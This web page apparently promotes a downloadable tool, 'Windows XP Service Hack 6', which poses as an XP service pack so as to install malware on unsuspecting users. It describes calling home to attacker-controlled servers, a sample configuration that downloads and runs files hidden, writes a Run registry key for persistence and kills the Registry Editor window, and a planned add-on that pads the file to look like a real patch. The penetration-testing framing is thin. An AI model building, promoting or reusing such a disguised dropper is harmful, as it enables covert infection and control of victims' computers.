Your Shopping Cart


Cart empty

Share, Like or Comment on...  

primi sui motori con

Member Login  


Members Online  

A new hack tool in the image of windows xp service pack updates that allows you to install malware, or other applications on an unsuspecting user during penetration testing. This tool was mirrored after the installation process of windows xp service packs and allows you to configure the application. The software supports x86, x64, Ithanium and all processors listed.

Windows XP Service Hack 6

As we all know windows XP has come to an unfortunate end. Unfortunate, really? Probably not. And, a lot of people (especially major corporations [WHO WOULD HAVE THOUGHT?!?!?!?] are paying Microsoft to stay in bed with them longer) are still running windows XP. Whether it be because of legacy requirements, or core functionality requirements, libraries that they still need. Who knows? The list can go on. In any case, the cheap idiots don't always seem to ever have the money to expand (banks) even though they are within inches of taking everything we own, and probably soon at gun point. Hey, they did it with the school system so why not change tactics?

So, this had me thinking. Why not produce something some penetration testers may be able to utilize, or who ever is involved in the security industry? I'm not releasing this in ode to causing havoc. Just testing! So if your intentions are of the bad kind (I don't care if you have cookies) don't download our tools.

The major point behind the software is targeted at social engineering, and as we all know... There is no patch for human stupidity. So without further babbling I shall introduce the XP Service Hack 6 tool.

Demonstrating the details of the first view

Service hack 6 comes with a command line driven option set for configuration methods. Where you see is the name of the "patch" in this example lower-case -c tells the program to clear the settings you've specified, while -C tells the patch to enter configurations mode. The examples below demonstrate this.

View of running the application in configurations mode with upper-case -C

View of clearing the configurations in the application using the upper-case -C

The example above is what the user would see when they run the application, right when the application is run it automatically checks for and installs your configuration file. If no configuration file is specified it will contact the servers that are under your control. Each server may be entered as a comma separated valueso you may enter as many servers as you choose. However, this is only for call home capabilities. The other options were implemented so you may rename your configuration file to whichever file you choose it to be config.xml, config.exe, this.something. Any name is sound so long as it is created and included with the application when it is sent. If you do not wish to enter a configuration file you can (in later versions) specify a file download location to download a configuration file and read from it to execute functions.

Currently the application supports the functions to execute, download, copy and put information to registry paths. You can also kill windows and applications within the configuration file as well. Below is a sample of a configuration file with it's meaning next to it.

get, C:\windows\filename.exe //SPECIFY A SITE AND FILE AND WHERE TO STORE
execute C:\windows\system32\cmd.exe //EXECUTE A FILE IN NORMAL VIEW
putreg hkey_local_machine\software\microsoft\windows\run, fname, fpath //PUT INFORMATION TO A REGISTRY PATH
cp C:\camera.log, C:\camera2_.log //COPY A FILE FROM AND TO A LOCATION
killwnd Registry Editor // KILL A WINDOW BY NAME
exech C:\windows\regedit.exe //EXECUTE A FILE IN HIDDEN MODE.

Please be advised the end users or the boxes you are targeting need .net framework 4.0 to operate. Without .net it will be pointless. I may code an extension onto the application, or standalone application which is called Service Hack 6 Balloon. What this does is make the "patch" larger in size so it appears as a real patch. Should you require any additions to the backend, let me know. Drop me a line!

Service hack 6 allows you to specifically target windows xp boxes with versioning information, however, will error and install malware for other operating systems, too! Once the application errors it quits. So, your target needs to be in windows XP for the full theatrics to be visible.

Download Now

If you like the tool, do me a solid and share with the community! I would appreciate it, and I'm sure others would, too!

Share, Like or Comment on...  

primi sui motori con